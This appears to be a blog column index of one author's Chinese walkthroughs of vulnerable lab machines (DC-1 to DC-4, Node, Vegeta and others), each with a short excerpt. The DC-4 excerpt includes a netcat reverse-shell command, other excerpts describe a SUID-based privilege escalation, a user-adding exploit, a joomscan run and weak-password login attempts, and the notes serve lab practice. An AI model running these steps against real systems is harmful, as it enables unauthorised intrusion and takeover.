靶机笔记
关注
分享
扫一扫
文章平均质量分 82
ZS_zsx
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
bulldog靶机复现
注:个人笔记,有点简陋,仅供参考。准备:把kali和靶机设置为同一网段(NAT)原创 2023-11-14 17:44:59 · 287 阅读 · 0 评论 -
DC -2 靶机复盘
注:个人笔记,比较简陋,仅供参考。原创 2023-11-04 10:39:43 · 251 阅读 · 0 评论 -
DC -3靶机复盘
针对joomla开发的漏洞扫描器joomscan -u [要攻击的IP或URL]原创 2023-11-02 21:38:01 · 467 阅读 · 0 评论 -
DC- 4 靶机复盘
nc -e /bin/bash [监听的IP,也是kali ip] [监听的端口]原创 2023-10-31 22:07:55 · 322 阅读 · 0 评论 -
DC -1靶机复盘
(使用find命令,find命令在/目录下面,-perm 按文件的权限来查找,-u=s 是表示对该文件有shell uid权限,2>/dev/null 错误从定向到null)使用此命令回车后可以看见一些有权限的文件,在这里使用/usr/bin/find 这个文件。然后要了解这是什么系统,版本,用什么编写的,可使用 指纹搜索(Wappalyzer)进行查看,使用此命令查找漏洞,用查找到的漏洞进行尝试利用,在这里使用34992.py 这个添加用户的漏洞。通过此命令可以查看配置,目前配置是本地的,原创 2023-10-21 14:49:41 · 107 阅读 · 1 评论 -
简单靶机 Lampiao 笔记
准备:kali 、 Lampiao靶机kali 靶机设置为同一网段。原创 2023-09-19 16:12:51 · 413 阅读 · 0 评论 -
Lazysysadmin靶机复盘
Lazysysadmin靶机复盘个人笔记。原创 2023-09-30 19:18:48 · 162 阅读 · 0 评论 -
Vegeta靶机复盘
扫描后发现一目录,打开后发现是个文件,文件里有段音频,下载下来播放,发现这是一段类似电报的滴滴答答的声音。按upload上传hahahaha.wav,然后按play,自动转为文本信息。登录成功过后查看隐藏目录,发现可以查看历史命令,打开后发现居然可以往。点开这个目录下唯一的文件,在源代码中发现一串加密的密钥。里面写入内容,检查之后发现,我对这个文件具有写入权限。base64解码之后还是一堆没有意义的乱码,此路不通。在扫描目录下并没有发现有用的信息,最后在。登录网站后发现一个静态的网页。原创 2023-10-05 17:52:27 · 76 阅读 · 0 评论 -
Node靶机复盘
在http://10.4.7.132:3000/api/users/latest这条链接中,单词“latest”表示最新的,去掉“latest”尝试进行访问,说不定会有意想不到的收获。因为http服务使用的是3000端口,不是默认的80端口,所以在进行目录探测时,需使用参数 ’ -f ’ 进行微调。发现一个可以进行登录的网页,尝试进行使用弱口令admin,admin等尝试多次登录,登录失败。尝试进行登录,登录成功,发现可以下载网站备份,然后进行下载。接连进行两次目录扫描,都没发现什么可用的目录,原创 2023-10-19 22:17:46 · 107 阅读 · 0 评论